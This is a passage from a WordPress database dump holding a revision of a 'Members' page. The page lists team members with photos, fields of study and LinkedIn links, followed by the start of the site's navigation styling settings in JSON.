</a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',182,'https://gsudice.dataconn.net/?p=1714',0,'revision','',0),(1715,1,'2023-10-13 09:20:33','2023-10-13 13:20:33','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 